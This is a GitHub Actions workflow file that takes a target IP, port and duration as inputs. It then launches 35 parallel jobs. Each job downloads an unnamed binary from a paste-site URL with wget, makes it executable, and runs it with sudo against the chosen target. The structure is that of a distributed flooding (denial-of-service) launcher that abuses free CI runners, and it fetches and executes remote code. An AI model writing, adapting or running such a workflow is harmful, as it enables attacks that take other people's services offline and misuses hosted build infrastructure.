name: Beta !

on:
  workflow_dispatch:
    inputs:
      target:
        description: "IP !"
        required: true
        default: "127.0.1"
      port:
        description: "Port !"
        required: true
        default: "31"
      time:
        description: "Time"
        required: true
        default: "70"
      conc:
        description: "Concurrency (optional)"
        required: false
        default: "1"

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 35
      matrix:
        instance: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35]

    steps:
      - name: Checkout (optional)
        uses: actions/checkout@v4

      - name: OK !
        run: |
          TARGET="${{ inputs.target }}"
          PORT="${{ inputs.port }}"
          TIME="${{ inputs.time }}"
          
          
          wget -q https://curl.by/ZLEpH/raw -O Beta
          chmod +x Beta || true
          
          # Arka planda çalıştır, timeout ile sınırlı
          sudo timeout "$TIME" ./Beta "$TARGET" "$PORT" 120 123 &

      - name: Finish !
        run: |
          sleep 120
          exit 0
